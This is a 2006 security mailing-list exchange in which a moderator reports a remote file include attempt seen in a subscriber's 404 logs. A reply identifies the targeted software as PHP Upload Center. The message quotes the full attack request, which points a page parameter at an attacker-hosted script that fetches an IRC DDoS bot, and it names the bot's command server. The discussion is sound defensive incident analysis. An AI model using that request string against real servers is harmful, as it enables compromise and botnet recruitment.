Security Incidents mailing list archives
Re: http://thebesthack.altervista.org/input.txt
From: "Bojan Zdrnja" <bojan.zdrnja () gmail com>
Date: Thu, 14 Dec 2006 13:33:44 +1300
Hi Josh, On 12/14/06, modincidents () mail securityfocus com <modincidents () mail securityfocus com> wrote:
An incidents subscriber emailed me stating that they were getting the following in there 404 logs: PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.altervista.org/input.txt? It appears that an attacker is attempting to exploit a remote file include vulnerability. If the attack had been successful and the http://thebesthack.altervista.org/input.txt file was processed by the web server, it would have attempted to download, run, and then delete a file from http://thebesthack.altervista.org/ddos.pl. ddos.pl is a simple IRC bot written in perl that will connect to dos-net.sytes.net:6667 and join #ddos. Does anyone know the specific vulnerability that this attack is attempting to exploit?
Yep, it's PHP Upload Center, http://www.securityfocus.com/bid/21412/info Cheers, Bojan ------------------------------------------------------------------------------ This List Sponsored by: Black HatAttend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas. World renowned security experts reveal tomorrow's threats today. Free of vendor pitches, the Briefings are designed to be pragmatic regardless of your security environment. Featuring 36 hands-on training courses and 10 conference tracks, networking opportunities with over 2,500 delegates from 40+ nations.
http://www.blackhat.com ------------------------------------------------------------------------------
Current thread:
- http://thebesthack.altervista.org/input.txt modincidents (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt Bojan Zdrnja (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt ascii (Dec 14)
- Re: http://thebesthack.altervista.org/input.txt Adriano Carvalho (Dec 14)
- <Possible follow-ups>
- Re: http://thebesthack.altervista.org/input.txt santa (Dec 13)